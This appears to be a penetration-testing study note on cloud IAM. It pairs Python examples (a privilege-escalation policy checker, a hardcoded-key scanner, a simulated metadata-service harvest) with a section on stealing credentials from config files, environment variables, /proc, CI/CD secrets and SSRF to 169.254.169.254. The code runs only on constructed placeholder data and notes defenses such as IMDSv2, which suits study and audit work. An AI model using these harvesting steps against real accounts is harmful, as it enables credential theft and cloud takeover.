IAM (Identity and Access Management) credentials are used to control and manage access to cloud services and resources. When a penetration tester obtains IAM credentials, especially those with administrative privileges, they can perform high-level operations such as provisioning services, modifying configurations, or accessing sensitive data across the cloud environment.

📝 Overview

What it is: A security framework that manages digital identities and regulates how they access resources. It is the “gatekeeper” of modern enterprise and cloud environments.
Phase: passive (Recon) / attack / post-exploitation
Target: Active Directory, AWS, Azure, Google Cloud

⚙️ Core Concepts

  • Principle of Least Privilege (PoLP): Giving users only the minimum access they need to do their jobs.
  • RBAC vs. ABAC:
    • Role-Based: Access based on your job function (e.g., “Manager”).
    • Attribute-Based: Access based on context (e.g., “Only if on the office Wi-Fi during business hours”).
  • SSO (Single Sign-On): One set of credentials for multiple systems.

💻 Essential CLI tools

Tool: Purpose
  • aws-cli: The native tool for interacting with AWS IAM (enumerate users, roles and policies, assume roles, test what a key can do).
  • Pacu: An AWS exploitation framework (the “Metasploit of AWS”) with modules for IAM enumeration and privilege-escalation scanning.
  • Prowler: An auditing tool that checks AWS (and other cloud) accounts for IAM misconfigurations such as unused keys, missing MFA and over-broad policies.
  • PMapper: Builds a graph of IAM principals and their permissions to find hidden PrivEsc paths (for example, who can reach an admin role through iam:PassRole).

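The kind of check PMapper and Pacu automate, as an added example written for this page (it is not the code of either tool): given an IAM policy document, decide whether it allows one of a few well-known privilege-escalation action combinations. It honours IAM’s explicit-Deny-wins rule and the `*` / `?` wildcards in action names, but ignores Resource, Condition and NotAction, so a hit is a candidate path to confirm by hand, not proof. The policy, account ID and combo list are constructed for the example.

```python
"""Added example (not PMapper's or Pacu's own code): flag known IAM privilege-
escalation action combinations in a policy document. Honours explicit-Deny-wins
and '*' / '?' wildcards; ignores Resource, Condition and NotAction, so a hit is
a candidate path to confirm, not proof. The policy below is constructed."""
import fnmatch
import json

# Constructed sample: a "support" policy that looks read-only at a glance but
# allows launching an instance with any role in the account passed to it.
SUPPORT_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": ["ec2:Describe*", "ec2:RunInstances"], "Resource": "*"},
        {"Effect": "Allow", "Action": "iam:PassRole",
         "Resource": "arn:aws:iam::123456789012:role/*"},
        {"Effect": "Deny", "Action": "iam:CreateAccessKey", "Resource": "*"},
    ],
})

# Escalation combos: every action in the set must be allowed for the path to exist.
PRIVESC_COMBOS = {
    "PassRole + RunInstances": {"iam:PassRole", "ec2:RunInstances"},
    "PassRole + Lambda": {"iam:PassRole", "lambda:CreateFunction", "lambda:InvokeFunction"},
    "CreateAccessKey": {"iam:CreateAccessKey"},
    "AttachUserPolicy": {"iam:AttachUserPolicy"},
}


def _as_list(value):
    return value if isinstance(value, list) else [value]


def _matches(pattern, action):
    # Action names are case-insensitive; '*' and '?' are the IAM wildcards.
    return fnmatch.fnmatchcase(action.lower(), pattern.lower())


def is_allowed(policy, action):
    """Explicit Deny beats Allow; no matching statement is an implicit deny."""
    allowed = False
    for stmt in _as_list(policy.get("Statement", [])):
        for pattern in _as_list(stmt.get("Action", [])):
            if _matches(pattern, action):
                if stmt.get("Effect") == "Deny":
                    return False
                allowed = True
    return allowed


def find_privesc_paths(policy_json):
    """Return the names of combos fully allowed by the policy (a JSON string)."""
    policy = json.loads(policy_json)
    return [name for name, actions in PRIVESC_COMBOS.items()
            if all(is_allowed(policy, a) for a in actions)]


if __name__ == "__main__":
    print(find_privesc_paths(SUPPORT_POLICY))  # ['PassRole + RunInstances']
```

To run this against a real account, pull the policy with `aws iam get-policy-version` (or `get-user-policy` / `get-role-policy` for inline policies) and feed the `Document` object in; remember that a principal’s effective permissions are the union of every attached and inline policy plus group policies, so evaluate them together, not one at a time.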
🏷️ Tags

IAM CloudSecurity AccessControl PrivEsc attack postexploitation CLItool PenTestPlus

IAM Credentials

📝 Overview

What it is: The programmatic “keys” used by users and services to authenticate with cloud providers or identity systems.
Phase: attack / post-exploitation
Operating System: Cross-platform (Cloud-native)

⚙️ Key Types

  • Long-term Keys: Permanent access keys for an IAM user (e.g., an AWS Access Key ID beginning with AKIA plus its Secret Access Key). They never expire unless someone rotates them, so they are dangerous if leaked.
  • Temporary Credentials: Short-lived access key (AWS IDs begin with ASIA), secret key and session token issued by STS to an assumed role. Role sessions default to 1 hour and can be configured for up to 12 hours; the session token must be sent with every request.
  • Service Accounts: Credentials specifically for non-human users (bots, apps, scripts).

⚠️ Notes for the Vault

  • Hardcoded Secrets: Among the most common findings in cloud audits. Always search codebases, config files and commit history for variable names like SECRET_KEY or ACCESS_KEY and for the key-ID prefixes themselves (AKIA, ASIA).
  • Privilege Escalation: A stolen “Support” key might have iam:PassRole together with ec2:RunInstances. That lets you launch a new instance with an “Admin” instance profile attached, then read the admin role’s temporary credentials from that instance’s metadata service.
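A scanner for the hardcoded-secrets hunt above, which also covers the local-configuration-file and environment-variable harvesting described under “How Pentesters Steal IAM Credentials”. It is an added example written for this page, not a tool from the original. It matches AWS access-key-ID prefixes and keyword assignments in free-form text, and parses the INI layout of ~/.aws/credentials to tell long-term keys from temporary ones. All inputs are constructed samples built on AWS’s documented placeholder key AKIAIOSFODNN7EXAMPLE and its example secret.

```python
"""Added example (not from the page or any named tool): hunt for hardcoded or
leaked AWS credentials in source files, environment dumps and
~/.aws/credentials-style files. All inputs below are constructed samples using
AWS's documented placeholder key AKIAIOSFODNN7EXAMPLE and its example secret."""
import configparser
import re

# Access key IDs: AKIA = long-term IAM user key, ASIA = temporary STS key.
AWS_KEY_ID = re.compile(r"(?<![A-Z0-9])(?:AKIA|ASIA)[A-Z0-9]{16}(?![A-Z0-9])")
# Keyword assignments: SECRET_KEY=..., "ACCESS_KEY": "...", aws_secret_access_key = ...
KEYWORD_ASSIGN = re.compile(
    r"(?i)\b([A-Z0-9_]*(?:SECRET|ACCESS)_?KEY[A-Z0-9_]*)[\"']?\s*[=:]\s*[\"']?([^\s\"',}]+)")

# --- constructed samples ---------------------------------------------------
SOURCE_FILE = 'config = {"ACCESS_KEY": "AKIAIOSFODNN7EXAMPLE", "SECRET_KEY": "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"}\n'
ENV_DUMP = (
    "PATH=/usr/bin\n"
    "AWS_ACCESS_KEY_ID=ASIAIOSFODNN7EXAMPLE\n"
    "AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\n"
    "AWS_SESSION_TOKEN=FwoGZXIvYXdzEXAMPLETOKEN\n"
    "HOME=/root\n"
)
CREDENTIALS_FILE = """\
[default]
aws_access_key_id = AKIAIOSFODNN7EXAMPLE
aws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY

[assumed-role]
aws_access_key_id = ASIAIOSFODNN7EXAMPLE
aws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
aws_session_token = FwoGZXIvYXdzEXAMPLETOKEN
"""


def mask(value):
    """Never echo a live secret into a report; keep just enough to identify it."""
    return value[:4] + "..." + value[-4:] if len(value) > 8 else "***"


def scan_text(name, text):
    """Return (source, kind, value) findings for free-form text (code, env output)."""
    findings = []
    for m in AWS_KEY_ID.finditer(text):
        kind = "aws-key-id-long-term" if m.group().startswith("AKIA") else "aws-key-id-temporary"
        findings.append((name, kind, m.group()))  # key IDs are not secret; shown in full
    for m in KEYWORD_ASSIGN.finditer(text):
        findings.append((name, "assignment:" + m.group(1).lower(), mask(m.group(2))))
    return findings


def scan_credentials_file(name, text):
    """Parse the INI layout of ~/.aws/credentials. A profile with a session
    token holds temporary STS creds; one without holds a long-term key."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(text)
    findings = []
    for profile in cp.sections():
        if cp.has_option(profile, "aws_secret_access_key"):
            key_id = cp.get(profile, "aws_access_key_id", fallback="?")
            lifetime = "temporary" if cp.has_option(profile, "aws_session_token") else "long-term"
            findings.append((name, "profile:" + profile, key_id, lifetime))
    return findings


def scan_all():
    """Run every scanner over the constructed samples and combine the findings."""
    return (scan_text("app.py", SOURCE_FILE)
            + scan_text("env", ENV_DUMP)
            + scan_credentials_file("~/.aws/credentials", CREDENTIALS_FILE))


if __name__ == "__main__":
    for finding in scan_all():
        print(finding)
```

On a real host, feed `scan_text` the output of `env` (or `/proc/<pid>/environ` for other processes) and the contents of files found with `grep -rE 'AKIA|ASIA|SECRET_KEY|ACCESS_KEY'`, and point `scan_credentials_file` at ~/.aws/credentials. A long-term AKIA key is the higher-value find: an ASIA key dies with its session.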

🏷️ Tags

IAM CloudSecurity Credentials postexploitation attack CLItool PenTestPlus

How Pentesters Steal IAM Credentials

Since you are mapping out attack paths, here are the primary ways these are harvested:

  1. Local Configuration Files: Pentesters use Linux commands like grep (or findstr on Windows) to hunt for credential files such as ~/.aws/credentials, the Azure CLI token cache under ~/.azure/, and the gcloud credential store under ~/.config/gcloud/.

  2. Metadata Services (SSRF): If you compromise a web server or find an SSRF, query the internal metadata service (169.254.169.254 on AWS and Azure; metadata.google.internal on GCP) to pull the credentials of the IAM role assigned to that host. Caveat: AWS IMDSv2 requires a PUT request to obtain a session token before any GET, and Azure and GCP require a specific request header (Metadata: true and Metadata-Flavor: Google respectively), so a GET-only SSRF with no header control often cannot reach them.

  3. Environment Variables: Developers often store keys in environment variables (AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY and friends) for easy access. Once you have a shell, dump them with env, or read another process’s environment from /proc/<pid>/environ.

  4. CI/CD Pipelines: Tools like Jenkins or GitHub Actions store “Secrets” for their jobs. They are masked in logs but are handed to the build steps in clear, so if you can modify a pipeline or gain access to the build server or runner, you can usually exfiltrate these keys.
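The metadata-service request sequence from step 2, as an added example written for this page (not code from the original). It walks the AWS IMDS paths an attacker needs (list the role name, then fetch that role’s credentials) and shows why the IMDSv2 token handshake stops a plain GET-based SSRF. The metadata service itself is an in-memory simulation constructed for the example; the paths, header names and credential JSON shape are the real IMDS ones, while the role name, token and credential values are placeholders.

```python
"""Added example: the request sequence for pulling role credentials from the
EC2 instance metadata service (169.254.169.254), and why IMDSv2 blocks a
GET-only SSRF. The IMDS here is a constructed in-memory simulation; role name,
token and credential values are placeholders."""
import json

IMDS = "http://169.254.169.254"
ROLE = "web-server-role"  # constructed
# Constructed placeholder credentials in the shape real IMDS returns.
CREDS = {"Code": "Success", "AccessKeyId": "ASIAIOSFODNN7EXAMPLE",
         "SecretAccessKey": "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY",
         "Token": "FwoGZXIvYXdzEXAMPLETOKEN", "Expiration": "2030-01-01T00:00:00Z"}


class SimulatedImds:
    """Answers the three paths the attack needs. With require_v2=True, any GET
    lacking a valid X-aws-ec2-metadata-token header gets 401, as IMDSv2 does."""

    def __init__(self, require_v2):
        self.require_v2 = require_v2
        self.tokens = set()

    def request(self, method, url, headers=None):
        headers = headers or {}
        path = url[len(IMDS):]
        if method == "PUT" and path == "/latest/api/token":
            if "X-aws-ec2-metadata-token-ttl-seconds" not in headers:
                return 400, ""
            token = "AQAEA-simulated-session-token"  # constructed
            self.tokens.add(token)
            return 200, token
        if self.require_v2 and headers.get("X-aws-ec2-metadata-token") not in self.tokens:
            return 401, ""
        if path == "/latest/meta-data/iam/security-credentials/":
            return 200, ROLE
        if path == "/latest/meta-data/iam/security-credentials/" + ROLE:
            return 200, json.dumps(CREDS)
        return 404, ""


def harvest_role_credentials(request, can_put=True):
    """`request(method, url, headers)` is whatever primitive the attacker has.
    A classic SSRF usually gives GET only (can_put=False): fine against IMDSv1,
    a dead end against an IMDSv2-only host. Returns the creds dict or None."""
    headers = {}
    if can_put:  # IMDSv2 handshake: PUT for a session token, send it on every GET
        status, token = request("PUT", IMDS + "/latest/api/token",
                                {"X-aws-ec2-metadata-token-ttl-seconds": "21600"})
        if status == 200:
            headers["X-aws-ec2-metadata-token"] = token
    status, role = request("GET", IMDS + "/latest/meta-data/iam/security-credentials/", headers)
    if status != 200 or not role:
        return None
    status, body = request("GET", IMDS + "/latest/meta-data/iam/security-credentials/" + role.strip(), headers)
    if status != 200:
        return None
    return json.loads(body)


if __name__ == "__main__":
    v1, v2 = SimulatedImds(require_v2=False), SimulatedImds(require_v2=True)
    print("IMDSv1, GET-only SSRF:", harvest_role_credentials(v1.request, can_put=False) is not None)
    print("IMDSv2, GET-only SSRF:", harvest_role_credentials(v2.request, can_put=False) is not None)
    print("IMDSv2, full shell:   ", harvest_role_credentials(v2.request, can_put=True) is not None)
```

With a real shell on the instance, `request` is just curl and the harvested triple goes straight into AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY and AWS_SESSION_TOKEN, after which `aws sts get-caller-identity` confirms which role you now hold. From the defender’s side, the simulation makes the mitigation concrete: enforcing IMDSv2 (and a hop limit of 1) turns the GET-only SSRF case into a 401.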